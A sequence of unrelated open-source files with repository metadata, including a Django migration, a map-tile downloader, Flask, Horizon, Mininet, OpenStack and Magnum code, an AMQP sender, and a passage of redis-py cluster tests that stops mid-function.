'num_basket_additions': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'num_orders': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'offers': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'vouchers'", 'symmetrical': 'False', 'to': u"orm['offer.ConditionalOffer']"}),
'start_date': ('django.db.models.fields.DateField', [], {}),
'total_discount': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'}),
'usage': ('django.db.models.fields.CharField', [], {'default': "'Multi-use'", 'max_length': '128'})
}
}
complete_apps = ['order']
|
{
"content_hash": "2d0f0a59ff0db57d42c745257aa499f2",
"timestamp": "",
"source": "github",
"line_count": 480,
"max_line_length": 238,
"avg_line_length": 93.45416666666667,
"alnum_prop": 0.5573141914485711,
"repo_name": "elliotthill/django-oscar",
"id": "b90cc13da20f03f7bebfcff6769a3ff6e231c6f8",
"size": "44882",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "oscar/apps/order/migrations/0023_rename_basket_field.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "1099824"
},
{
"name": "JavaScript",
"bytes": "818932"
},
{
"name": "Puppet",
"bytes": "3507"
},
{
"name": "Python",
"bytes": "4153712"
},
{
"name": "Shell",
"bytes": "4738"
},
{
"name": "XSLT",
"bytes": "49764"
}
],
"symlink_target": ""
}
|
from sys import argv
import os
import math
import urllib2
import time
import random
def deg2num(lat_deg, lon_deg, zoom):
lat_rad = math.radians(lat_deg)
n = 2.0 ** zoom
xtile = int((lon_deg + 180.0) / 360.0 * n)
ytile = int((1.0 - math.log(math.tan(lat_rad) + (1 / math.cos(lat_rad))) / math.pi) / 2.0 * n)
return (xtile, ytile)
def download_url(zoom, xtile, ytile, download_path):
# Switch between otile1 - otile4
subdomain = random.randint(1, 4)
url = "http://%d.basemaps.cartocdn.com/dark_all/%d/%d/%d.png" % (subdomain, zoom, xtile, ytile)
dir_path = "%s/tiles/%d/%d/" % (download_path, zoom, xtile)
download_path = "%s/tiles/%d/%d/%d.png" % (download_path, zoom, xtile, ytile)
if not os.path.exists(dir_path):
os.makedirs(dir_path)
if os.path.exists(download_path):
print "already downloaded %r" % url
else:
print "downloading %r" % url
time.sleep(1)
source = urllib2.urlopen(url)
content = source.read()
source.close()
destination = open(download_path,'wb')
destination.write(content)
destination.close()
def main(argv):
try:
south = 52.0
west = 20.7
north = 52.4
east = 21.3
min_zoom = 15
max_zoom = 16
download_path = "./"
except:
exit(2)
for zoom in range(int(min_zoom), int(max_zoom) + 1, 1):
xtile, ytile = deg2num(float(south), float(west), float(zoom))
final_xtile, final_ytile = deg2num(float(north), float(east), float(zoom))
for x in range(xtile, final_xtile + 1, 1):
for y in range(ytile, final_ytile - 1, -1):
download_url(int(zoom), x, y, download_path)
return 0
main(argv)
|
{
"content_hash": "a0392df2f16f8f14ff144ad2d9d1cee1",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 96,
"avg_line_length": 25.737704918032787,
"alnum_prop": 0.6535031847133758,
"repo_name": "ipepe/rails-real-tram-map",
"id": "3a23237cf58dce47ba093b056e72d43580fb6f58",
"size": "1595",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/download_tiles.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "32"
},
{
"name": "CSS",
"bytes": "2501"
},
{
"name": "HTML",
"bytes": "12558"
},
{
"name": "JavaScript",
"bytes": "8893"
},
{
"name": "Python",
"bytes": "1595"
},
{
"name": "Ruby",
"bytes": "26828"
},
{
"name": "Shell",
"bytes": "5653"
}
],
"symlink_target": ""
}
|
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
return "Hello World!"
if __name__ == "__main__":
app.run()
|
{
"content_hash": "72927ff4bd62e2f2be4acf0202783bec",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 26,
"avg_line_length": 13.272727272727273,
"alnum_prop": 0.547945205479452,
"repo_name": "talapus/Ophidian",
"id": "d71338e01739b738a922cbf289a01c0df3c788db",
"size": "146",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Flask_fu/hello.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "154649"
},
{
"name": "JavaScript",
"bytes": "3364"
},
{
"name": "Python",
"bytes": "314611"
},
{
"name": "Shell",
"bytes": "16809"
}
],
"symlink_target": ""
}
|
from django.conf import settings
from horizon import forms
from horizon.utils import functions as utils
from openstack_dashboard.dashboards.settings.user import forms as user_forms
class UserSettingsView(forms.ModalFormView):
form_class = user_forms.UserSettingsForm
template_name = 'settings/user/settings.html'
def get_initial(self):
return {
'language': self.request.session.get(
settings.LANGUAGE_COOKIE_NAME,
self.request.COOKIES.get(settings.LANGUAGE_COOKIE_NAME,
self.request.LANGUAGE_CODE)),
'timezone': self.request.session.get(
'django_timezone',
self.request.COOKIES.get('django_timezone', 'UTC')),
'pagesize': utils.get_page_size(self.request)}
def form_valid(self, form):
return form.handle(self.request, form.cleaned_data)
|
{
"content_hash": "0ab668f58f10213ffb00b2082a54cdcd",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 76,
"avg_line_length": 38.125,
"alnum_prop": 0.6437158469945355,
"repo_name": "spandanb/horizon",
"id": "bd551f74bc362c56443509f2db0d65d6cbe69554",
"size": "1520",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "openstack_dashboard/dashboards/settings/user/views.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
}
|
"""
This example shows how to add an interface (for example a real
hardware interface) to a network after the network is created.
"""
import re, sys
from mininet.cli import CLI
from mininet.log import setLogLevel, info, error
from mininet.net import Mininet
from mininet.link import Intf
from mininet.topolib import TreeTopo
from mininet.util import quietRun
def checkIntf( intf ):
"Make sure intf exists and is not configured."
if ( ' %s:' % intf ) not in quietRun( 'ip link show' ):
error( 'Error:', intf, 'does not exist!\n' )
exit( 1 )
ips = re.findall( r'\d+\.\d+\.\d+\.\d+', quietRun( 'ifconfig ' + intf ) )
if ips:
error( 'Error:', intf, 'has an IP address,'
'and is probably in use!\n' )
exit( 1 )
if __name__ == '__main__':
setLogLevel( 'info' )
# try to get hw intf from the command line; by default, use eth1
intfName = sys.argv[ 1 ] if len( sys.argv ) > 1 else 'eth1'
info( '*** Connecting to hw intf: %s' % intfName )
info( '*** Checking', intfName, '\n' )
checkIntf( intfName )
info( '*** Creating network\n' )
net = Mininet( topo=TreeTopo( depth=1, fanout=2 ) )
switch = net.switches[ 0 ]
info( '*** Adding hardware interface', intfName, 'to switch',
switch.name, '\n' )
_intf = Intf( intfName, node=switch )
info( '*** Note: you may need to reconfigure the interfaces for '
'the Mininet hosts:\n', net.hosts, '\n' )
net.start()
CLI( net )
net.stop()
|
{
"content_hash": "c2205740ba96978423ede842812e2e3b",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 77,
"avg_line_length": 31,
"alnum_prop": 0.6063199473337723,
"repo_name": "5GExchange/escape",
"id": "1e010fd35ff409f146546c161cb9a38bb490a190",
"size": "1538",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "mininet/examples/hwintf.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "381"
},
{
"name": "C",
"bytes": "9773701"
},
{
"name": "C++",
"bytes": "1144774"
},
{
"name": "Dockerfile",
"bytes": "4497"
},
{
"name": "HTML",
"bytes": "423218"
},
{
"name": "JavaScript",
"bytes": "9048"
},
{
"name": "Makefile",
"bytes": "121260"
},
{
"name": "Objective-C",
"bytes": "2964"
},
{
"name": "Python",
"bytes": "2856844"
},
{
"name": "Roff",
"bytes": "80820"
},
{
"name": "Shell",
"bytes": "190566"
}
],
"symlink_target": ""
}
|
import os
import time
import unittest
from openstack import connection
from openstack import exceptions
from openstack import service_filter
def requires_service(**kwargs):
"""Check whether a service is available for this test
When the service exists, the test will be run as normal.
When the service does not exist, the test will be skipped.
Usage:
@requires_service(service_type="identity", version="v3")
def test_v3_auth(self):
...
:param kwargs: The kwargs needed to create a
:class:`~openstack.service_filter.ServiceFilter`.
:returns: The test result if the test is executed.
:raises: SkipTest, which is handled by the test runner.
"""
def wrap(method):
def check(self):
try:
self.conn.authenticator.get_endpoint(
self.conn.transport,
service_filter.ServiceFilter(**kwargs))
return method(self)
except exceptions.EndpointNotFound as exc:
self.skip(exc.message)
return check
return wrap
class BaseFunctionalTest(unittest.TestCase):
class Opts(object):
def __init__(self):
self.cloud = os.getenv('OS_CLOUD', 'test_cloud')
@classmethod
def setUpClass(cls):
opts = cls.Opts()
cls.conn = connection.from_config(opts)
@classmethod
def assertIs(cls, expected, actual):
if expected != actual:
raise Exception(expected + ' != ' + actual)
@classmethod
def linger_for_delete(cls):
time.sleep(40)
|
{
"content_hash": "ce1a4c6ff1cdcdc89faea045146b41d9",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 68,
"avg_line_length": 28.017543859649123,
"alnum_prop": 0.6224170319348779,
"repo_name": "dudymas/python-openstacksdk",
"id": "c9765307be3a3713fe9064d6e35c6a10869f84ae",
"size": "2143",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "openstack/tests/functional/base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1062098"
},
{
"name": "Shell",
"bytes": "1383"
}
],
"symlink_target": ""
}
|
"""Magnum base exception handling.
Includes decorator for re-raising Magnum-type exceptions.
"""
import functools
import sys
import uuid
from keystoneclient import exceptions as keystone_exceptions
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
import pecan
import six
import wsme
from magnum.common import safe_utils
from magnum.i18n import _
from magnum.i18n import _LE
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
try:
CONF.import_opt('fatal_exception_format_errors',
'oslo_versionedobjects.exception')
except cfg.NoSuchOptError as e:
# Note:work around for magnum run against master branch
# in devstack gate job, as magnum not branched yet
# verisonobjects kilo/master different version can
# cause issue here. As it changed import group. So
# add here before branch to prevent gate failure.
# Bug: #1447873
CONF.import_opt('fatal_exception_format_errors',
'oslo_versionedobjects.exception',
group='oslo_versionedobjects')
def wrap_exception(notifier=None, event_type=None):
"""This decorator wraps a method to catch any exceptions.
It logs the exception as well as optionally sending
it to the notification system.
"""
def inner(f):
def wrapped(self, context, *args, **kw):
# Don't store self or context in the payload, it now seems to
# contain confidential information.
try:
return f(self, context, *args, **kw)
except Exception as e:
with excutils.save_and_reraise_exception():
if notifier:
call_dict = safe_utils.getcallargs(f, context,
*args, **kw)
payload = dict(exception=e,
private=dict(args=call_dict)
)
temp_type = event_type
if not temp_type:
# If f has multiple decorators, they must use
# functools.wraps to ensure the name is
# propagated.
temp_type = f.__name__
notifier.error(context, temp_type, payload)
return functools.wraps(f)(wrapped)
return inner
OBFUSCATED_MSG = _('Your request could not be handled '
'because of a problem in the server. '
'Error Correlation id is: %s')
def wrap_controller_exception(func, func_server_error, func_client_error):
"""This decorator wraps controllers methods to handle exceptions:
- if an unhandled Exception or a MagnumException with an error code >=500
is catched, raise a http 5xx ClientSideError and correlates it with a log
message
- if a MagnumException is catched and its error code is <500, raise a http
4xx and logs the excp in debug mode
"""
@functools.wraps(func)
def wrapped(*args, **kw):
try:
return func(*args, **kw)
except Exception as excp:
if isinstance(excp, MagnumException):
http_error_code = excp.code
else:
http_error_code = 500
if http_error_code >= 500:
# log the error message with its associated
# correlation id
log_correlation_id = str(uuid.uuid4())
LOG.error(_LE("%(correlation_id)s:%(excp)s") %
{'correlation_id': log_correlation_id,
'excp': str(excp)})
# raise a client error with an obfuscated message
func_server_error(log_correlation_id, http_error_code)
else:
# raise a client error the original message
LOG.debug(excp)
func_client_error(excp, http_error_code)
return wrapped
def wrap_wsme_controller_exception(func):
"""This decorator wraps wsme controllers to handle exceptions."""
def _func_server_error(log_correlation_id, status_code):
raise wsme.exc.ClientSideError(
six.text_type(OBFUSCATED_MSG % log_correlation_id), status_code)
def _func_client_error(excp, status_code):
raise wsme.exc.ClientSideError(six.text_type(excp), status_code)
return wrap_controller_exception(func,
_func_server_error,
_func_client_error)
def wrap_pecan_controller_exception(func):
"""This decorator wraps pecan controllers to handle exceptions."""
def _func_server_error(log_correlation_id, status_code):
pecan.response.status = status_code
pecan.response.text = six.text_type(OBFUSCATED_MSG %
log_correlation_id)
def _func_client_error(excp, status_code):
pecan.response.status = status_code
pecan.response.text = six.text_type(excp)
pecan.response.content_type = None
return wrap_controller_exception(func,
_func_server_error,
_func_client_error)
def wrap_keystone_exception(func):
"""Wrap keystone exceptions and throw Magnum specific exceptions."""
@functools.wraps(func)
def wrapped(*args, **kw):
try:
return func(*args, **kw)
except keystone_exceptions.AuthorizationFailure:
raise AuthorizationFailure(
client=func.__name__, message="reason: %s" % sys.exc_info()[1])
except keystone_exceptions.ClientException:
raise AuthorizationFailure(
client=func.__name__,
message="unexpected keystone client error occurred: %s"
% sys.exc_info()[1])
return wrapped
class MagnumException(Exception):
"""Base Magnum Exception
To correctly use this class, inherit from it and define
a 'message' property. That message will get printf'd
with the keyword arguments provided to the constructor.
"""
message = _("An unknown exception occurred.")
code = 500
def __init__(self, message=None, **kwargs):
self.kwargs = kwargs
if 'code' not in self.kwargs:
try:
self.kwargs['code'] = self.code
except AttributeError:
pass
if message:
self.message = message
try:
self.message = self.message % kwargs
except Exception as e:
# kwargs doesn't match a variable in the message
# log the issue and the kwargs
LOG.exception(_LE('Exception in string format operation'))
for name, value in kwargs.items():
LOG.error(_LE("%(name)s: %(value)s") %
{'name': name, 'value': value})
try:
if CONF.fatal_exception_format_errors:
raise e
except cfg.NoSuchOptError:
# Note: work around for Bug: #1447873
if CONF.oslo_versionedobjects.fatal_exception_format_errors:
raise e
super(MagnumException, self).__init__(self.message)
def __str__(self):
if six.PY3:
return self.message
return self.message.encode('utf-8')
def __unicode__(self):
return self.message
def format_message(self):
if self.__class__.__name__.endswith('_Remote'):
return self.args[0]
else:
return six.text_type(self)
class ObjectNotFound(MagnumException):
message = _("The %(name)s %(id)s could not be found.")
class ObjectNotUnique(MagnumException):
message = _("The %(name)s already exists.")
class ResourceNotFound(ObjectNotFound):
message = _("The %(name)s resource %(id)s could not be found.")
code = 404
class ResourceExists(ObjectNotUnique):
message = _("The %(name)s resource already exists.")
code = 409
class AuthorizationFailure(MagnumException):
message = _("%(client)s connection failed. %(message)s")
class UnsupportedObjectError(MagnumException):
message = _('Unsupported object type %(objtype)s')
class IncompatibleObjectVersion(MagnumException):
message = _('Version %(objver)s of %(objname)s is not supported')
class OrphanedObjectError(MagnumException):
message = _('Cannot call %(method)s on orphaned %(objtype)s object')
class Invalid(MagnumException):
message = _("Unacceptable parameters.")
code = 400
class InvalidUUID(Invalid):
message = _("Expected a uuid but received %(uuid)s.")
class InvalidName(Invalid):
message = _("Expected a name but received %(uuid)s.")
class InvalidUuidOrName(Invalid):
message = _("Expected a name or uuid but received %(uuid)s.")
class InvalidIdentity(Invalid):
message = _("Expected an uuid or int but received %(identity)s.")
class HTTPNotFound(ResourceNotFound):
pass
class Conflict(MagnumException):
message = _('Conflict.')
code = 409
class InvalidState(Conflict):
message = _("Invalid resource state.")
# Cannot be templated as the error syntax varies.
# msg needs to be constructed when raised.
class InvalidParameterValue(Invalid):
message = _("%(err)s")
class InstanceAssociated(Conflict):
message = _("Instance %(instance_uuid)s is already associated with a node,"
" it cannot be associated with this other node %(node)s")
class InstanceNotFound(ResourceNotFound):
message = _("Instance %(instance)s could not be found.")
class PatchError(Invalid):
message = _("Couldn't apply patch '%(patch)s'. Reason: %(reason)s")
class NotAuthorized(MagnumException):
message = _("Not authorized.")
code = 403
class NotAcceptable(MagnumException):
# TODO(yuntongjin): We need to set response headers
# in the API for this exception
message = _("Request not acceptable.")
code = 406
class InvalidMAC(Invalid):
message = _("Expected a MAC address but received %(mac)s.")
class ConfigInvalid(MagnumException):
message = _("Invalid configuration file. %(error_msg)s")
class NodeAlreadyExists(Conflict):
message = _("A node with UUID %(uuid)s already exists.")
class NodeNotFound(ResourceNotFound):
message = _("Node %(node)s could not be found.")
class NodeAssociated(InvalidState):
message = _("Node %(node)s is associated with instance %(instance)s.")
class SSHConnectFailed(MagnumException):
message = _("Failed to establish SSH connection to host %(host)s.")
class FileSystemNotSupported(MagnumException):
message = _("Failed to create a file system. "
"File system %(fs)s is not supported.")
class BayModelNotFound(ResourceNotFound):
message = _("Baymodel %(baymodel)s could not be found.")
class BayModelAlreadyExists(Conflict):
message = _("A baymodel with UUID %(uuid)s already exists.")
class BayModelReferenced(Invalid):
message = _("Baymodel %(baymodel)s is referenced by one or multiple bays.")
class BayNotFound(ResourceNotFound):
message = _("Bay %(bay)s could not be found.")
class BayAlreadyExists(Conflict):
message = _("A node with UUID %(uuid)s already exists.")
class ContainerNotFound(ResourceNotFound):
message = _("Container %(container)s could not be found.")
class ContainerAlreadyExists(Conflict):
message = _("A container with UUID %(uuid)s already exists.")
class PodNotFound(ResourceNotFound):
message = _("Pod %(pod)s could not be found.")
class PodAlreadyExists(Conflict):
message = _("A node with UUID %(uuid)s already exists.")
class ReplicationControllerNotFound(ResourceNotFound):
message = _("ReplicationController %(rc)s could not be found.")
class ReplicationControllerAlreadyExists(Conflict):
message = _("A ReplicationController with UUID %(uuid)s already exists.")
class ServiceNotFound(ResourceNotFound):
message = _("Service %(service)s could not be found.")
class ServiceAlreadyExists(Conflict):
message = _("A node with UUID %(uuid)s already exists.")
class ContainerException(Exception):
pass
class NotSupported(MagnumException):
message = _("%(operation)s is not supported.")
code = 400
class BayTypeNotSupported(MagnumException):
message = _("Bay type (%(server_type)s, %(os)s, %(coe)s)"
" not supported.")
class BayTypeNotEnabled(MagnumException):
message = _("Bay type (%(server_type)s, %(os)s, %(coe)s)"
" not enabled.")
class RequiredParameterNotProvided(MagnumException):
message = _("Required parameter %(heat_param)s not provided.")
class Urllib2InvalidScheme(MagnumException):
message = _("The urllib2 URL %(url) has an invalid scheme.")
class OperationInProgress(Invalid):
message = _("Bay %(bay_name)s already has an operation in progress.")
class ImageNotFound(ResourceNotFound):
message = _("Image %(image_id)s could not be found.")
class ImageNotAuthorized(MagnumException):
message = _("Not authorized for image %(image_id)s.")
class OSDistroFieldNotFound(ResourceNotFound):
message = _("Image %(image_id)s doesn't contain os_distro field.")
class KubernetesAPIFailed(MagnumException):
def __init__(self, message=None, **kwargs):
self.__class__.code = kwargs.get('code')
super(KubernetesAPIFailed, self).__init__(message, **kwargs)
|
{
"content_hash": "611da3a1cd6fd19c24e914ab1cbac9d7",
"timestamp": "",
"source": "github",
"line_count": 450,
"max_line_length": 79,
"avg_line_length": 30.13111111111111,
"alnum_prop": 0.6267423851316469,
"repo_name": "paulczar/magnum",
"id": "7585d7abfbb08f3e80b01f7367aa03f28da13137",
"size": "14139",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "magnum/common/exception.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "569"
},
{
"name": "Mako",
"bytes": "349"
},
{
"name": "Python",
"bytes": "1685855"
},
{
"name": "Shell",
"bytes": "22511"
}
],
"symlink_target": ""
}
|
from pdf2txt import pdfTotxt1, pdfTotxt2
import os
def handleStock(stock_dir, dir, root_txt_path):
for stock in stock_dir:
years_dir=os.listdir(dir+stock)
for y in years_dir:
type_dir=os.listdir(dir+stock+'/'+y)
for t in type_dir:
report_dir=os.listdir(dir+stock+'/'+y+'/'+t)
root_txt=root_txt_path+stock+'_'+y+'_'+t+'_Chairman Statement.txt'
if os.path.exists(root_txt):
continue
for r in report_dir:
try:
pdfTotxt1(dir+stock+'/'+y+'/'+t+'/'+r, root_txt)
except:
pdfTotxt2(dir+stock+'/'+y+'/'+t+'/'+r, root_txt)
if __name__=='__main__':
root_txt_path='/home/luowang/data/financial reports/demo_68_txt/'
if not os.path.exists(root_txt_path):
os.mkdir(root_txt_path)
root_pdf_path='/home/luowang/data/financial reports/demo_68_test/'
if os.path.exists(root_pdf_path):
stock_dir=os.listdir(root_pdf_path)
handleStock(stock_dir, root_pdf_path, root_txt_path)
|
{
"content_hash": "b615c282018919f539128c929bb9e416",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 82,
"avg_line_length": 35.59375,
"alnum_prop": 0.5329236172080772,
"repo_name": "FinancialSentimentAnalysis-team/Finanical-annual-reports-analysis-code",
"id": "e14d3f3318c4426d75cebd97e87fd9621811ddec",
"size": "1139",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "luowang/All_PDF_to_txt.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "6065"
},
{
"name": "Jupyter Notebook",
"bytes": "118087"
},
{
"name": "Perl",
"bytes": "24665"
},
{
"name": "Python",
"bytes": "772916"
},
{
"name": "Shell",
"bytes": "7125"
}
],
"symlink_target": ""
}
|
from __future__ import print_function, unicode_literals
import optparse
from proton import Message
from proton.handlers import MessagingHandler
from proton.reactor import Container
class Send(MessagingHandler):
def __init__(self, url, messages):
super(Send, self).__init__()
self.url = url
self.sent = 0
self.confirmed = 0
self.messages = messages
def on_start(self, event):
event.container.create_sender(self.url)
def on_sendable(self, event):
while event.sender.credit and self.sent < len(self.messages):
msg = Message(body=u"%s" % self.messages[self.sent])
event.sender.send(msg)
self.sent += 1
def on_accepted(self, event):
self.confirmed += 1
if self.confirmed == len(self.messages):
print("all messages confirmed")
event.connection.close()
def on_disconnected(self, event):
self.sent = self.confirmed
parser = optparse.OptionParser(usage="usage: %prog [options]",
description="Send messages to the supplied address.")
parser.add_option("-a", "--address", default="localhost:5672/examples",
help="address to which messages are sent (default %default)")
opts, args = parser.parse_args()
try:
Container(Send(opts.address, args)).run()
except KeyboardInterrupt: pass
|
{
"content_hash": "41aa0c11eb843a14ab02ee0076046599",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 84,
"avg_line_length": 33.8780487804878,
"alnum_prop": 0.6371490280777538,
"repo_name": "grs/amqp_subscriptions",
"id": "ded0af56df9574fa97c578c7e2e4436164b9c089",
"size": "2201",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "send.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "31704"
}
],
"symlink_target": ""
}
|
import binascii
import datetime
import warnings
from time import sleep
from unittest.mock import DEFAULT, Mock, call, patch
import pytest
from redis import Redis
from redis.cluster import (
PRIMARY,
REDIS_CLUSTER_HASH_SLOTS,
REPLICA,
ClusterNode,
NodesManager,
RedisCluster,
get_node_name,
)
from redis.commands import CommandsParser
from redis.connection import Connection
from redis.crc import key_slot
from redis.exceptions import (
AskError,
ClusterDownError,
ConnectionError,
DataError,
MovedError,
NoPermissionError,
RedisClusterException,
RedisError,
ResponseError,
)
from redis.utils import str_if_bytes
from tests.test_pubsub import wait_for_message
from .conftest import (
_get_client,
skip_if_redis_enterprise,
skip_if_server_version_lt,
skip_unless_arch_bits,
wait_for_command,
)
default_host = "127.0.0.1"
default_port = 7000
default_cluster_slots = [
[
0,
8191,
["127.0.0.1", 7000, "node_0"],
["127.0.0.1", 7003, "node_3"],
],
[8192, 16383, ["127.0.0.1", 7001, "node_1"], ["127.0.0.1", 7002, "node_2"]],
]
@pytest.fixture()
def slowlog(request, r):
"""
Set the slowlog threshold to 0, and the
max length to 128. This will force every
command into the slowlog and allow us
to test it
"""
# Save old values
current_config = r.config_get(target_nodes=r.get_primaries()[0])
old_slower_than_value = current_config["slowlog-log-slower-than"]
old_max_legnth_value = current_config["slowlog-max-len"]
# Function to restore the old values
def cleanup():
r.config_set("slowlog-log-slower-than", old_slower_than_value)
r.config_set("slowlog-max-len", old_max_legnth_value)
request.addfinalizer(cleanup)
# Set the new values
r.config_set("slowlog-log-slower-than", 0)
r.config_set("slowlog-max-len", 128)
def get_mocked_redis_client(func=None, *args, **kwargs):
"""
Return a stable RedisCluster object that have deterministic
nodes and slots setup to remove the problem of different IP addresses
on different installations and machines.
"""
cluster_slots = kwargs.pop("cluster_slots", default_cluster_slots)
coverage_res = kwargs.pop("coverage_result", "yes")
cluster_enabled = kwargs.pop("cluster_enabled", True)
with patch.object(Redis, "execute_command") as execute_command_mock:
def execute_command(*_args, **_kwargs):
if _args[0] == "CLUSTER SLOTS":
mock_cluster_slots = cluster_slots
return mock_cluster_slots
elif _args[0] == "COMMAND":
return {"get": [], "set": []}
elif _args[0] == "INFO":
return {"cluster_enabled": cluster_enabled}
elif len(_args) > 1 and _args[1] == "cluster-require-full-coverage":
return {"cluster-require-full-coverage": coverage_res}
elif func is not None:
return func(*args, **kwargs)
else:
return execute_command_mock(*_args, **_kwargs)
execute_command_mock.side_effect = execute_command
with patch.object(
CommandsParser, "initialize", autospec=True
) as cmd_parser_initialize:
def cmd_init_mock(self, r):
self.commands = {
"get": {
"name": "get",
"arity": 2,
"flags": ["readonly", "fast"],
"first_key_pos": 1,
"last_key_pos": 1,
"step_count": 1,
}
}
cmd_parser_initialize.side_effect = cmd_init_mock
return RedisCluster(*args, **kwargs)
def mock_node_resp(node, response):
connection = Mock()
connection.read_response.return_value = response
node.redis_connection.connection = connection
return node
def mock_node_resp_func(node, func):
connection = Mock()
connection.read_response.side_effect = func
node.redis_connection.connection = connection
return node
def mock_all_nodes_resp(rc, response):
for node in rc.get_nodes():
mock_node_resp(node, response)
return rc
def find_node_ip_based_on_port(cluster_client, port):
for node in cluster_client.get_nodes():
if node.port == port:
return node.host
def moved_redirection_helper(request, failover=False):
"""
Test that the client handles MOVED response after a failover.
Redirection after a failover means that the redirection address is of a
replica that was promoted to a primary.
At first call it should return a MOVED ResponseError that will point
the client to the next server it should talk to.
Verify that:
1. it tries to talk to the redirected node
2. it updates the slot's primary to the redirected node
For a failover, also verify:
3. the redirected node's server type updated to 'primary'
4. the server type of the previous slot owner updated to 'replica'
"""
rc = _get_client(RedisCluster, request, flushdb=False)
slot = 12182
redirect_node = None
# Get the current primary that holds this slot
prev_primary = rc.nodes_manager.get_node_from_slot(slot)
if failover:
if len(rc.nodes_manager.slots_cache[slot]) < 2:
warnings.warn("Skipping this test since it requires to have a " "replica")
return
redirect_node = rc.nodes_manager.slots_cache[slot][1]
else:
# Use one of the primaries to be the redirected node
redirect_node = rc.get_primaries()[0]
r_host = redirect_node.host
r_port = redirect_node.port
with patch.object(Redis, "parse_response") as parse_response:
def moved_redirect_effect(connection, *args, **options):
def ok_response(connection, *args, **options):
assert connection.host == r_host
assert connection.port == r_port
return "MOCK_OK"
parse_response.side_effect = ok_response
raise MovedError(f"{slot} {r_host}:{r_port}")
parse_response.side_effect = moved_redirect_effect
assert rc.execute_command("SET", "foo", "bar") == "MOCK_OK"
slot_primary = rc.nodes_manager.slots_cache[slot][0]
assert slot_primary == redirect_node
if failover:
assert rc.get_node(host=r_host, port=r_port).server_type == PRIMARY
assert prev_primary.server_type == REPLICA
@pytest.mark.onlycluster
class TestRedisClusterObj:
"""
Tests for the RedisCluster class
"""
def test_host_port_startup_node(self):
"""
Test that it is possible to use host & port arguments as startup node
args
"""
cluster = get_mocked_redis_client(host=default_host, port=default_port)
assert cluster.get_node(host=default_host, port=default_port) is not None
def test_startup_nodes(self):
"""
Test that it is possible to use startup_nodes
argument to init the cluster
"""
port_1 = 7000
port_2 = 7001
startup_nodes = [
ClusterNode(default_host, port_1),
ClusterNode(default_host, port_2),
]
cluster = get_mocked_redis_client(startup_nodes=startup_nodes)
assert (
cluster.get_node(host=default_host, port=port_1) is not None
and cluster.get_node(host=default_host, port=port_2) is not None
)
def test_empty_startup_nodes(self):
"""
Test that exception is raised when empty providing empty startup_nodes
"""
with pytest.raises(RedisClusterException) as ex:
RedisCluster(startup_nodes=[])
assert str(ex.value).startswith(
"RedisCluster requires at least one node to discover the " "cluster"
), str_if_bytes(ex.value)
def test_from_url(self, r):
redis_url = f"redis://{default_host}:{default_port}/0"
with patch.object(RedisCluster, "from_url") as from_url:
def from_url_mocked(_url, **_kwargs):
return get_mocked_redis_client(url=_url, **_kwargs)
from_url.side_effect = from_url_mocked
cluster = RedisCluster.from_url(redis_url)
assert cluster.get_node(host=default_host, port=default_port) is not None
def test_execute_command_errors(self, r):
"""
Test that if no key is provided then exception should be raised.
"""
with pytest.raises(RedisClusterException) as ex:
r.execute_command("GET")
assert str(ex.value).startswith(
"No way to dispatch this command to " "Redis Cluster. Missing key."
)
def test_execute_command_node_flag_primaries(self, r):
"""
Test command execution with nodes flag PRIMARIES
"""
primaries = r.get_primaries()
replicas = r.get_replicas()
mock_all_nodes_resp(r, "PONG")
assert r.ping(target_nodes=RedisCluster.PRIMARIES) is True
for primary in primaries:
conn = primary.redis_connection.connection
assert conn.read_response.called is True
for replica in replicas:
conn = replica.redis_connection.connection
assert conn.read_response.called is not True
def test_execute_command_node_flag_replicas(self, r):
"""
Test command execution with nodes flag REPLICAS
"""
replicas = r.get_replicas()
if not replicas:
r = get_mocked_redis_client(default_host, default_port)
primaries = r.get_primaries()
mock_all_nodes_resp(r, "PONG")
assert r.ping(target_nodes=RedisCluster.REPLICAS) is True
for replica in replicas:
conn = replica.redis_connection.connection
assert conn.read_response.called is True
for primary in primaries:
conn = primary.redis_connection.connection
assert conn.read_response.called is not True
def test_execute_command_node_flag_all_nodes(self, r):
"""
Test command execution with nodes flag ALL_NODES
"""
mock_all_nodes_resp(r, "PONG")
assert r.ping(target_nodes=RedisCluster.ALL_NODES) is True
for node in r.get_nodes():
conn = node.redis_connection.connection
assert conn.read_response.called is True
def test_execute_command_node_flag_random(self, r):
"""
Test command execution with nodes flag RANDOM
"""
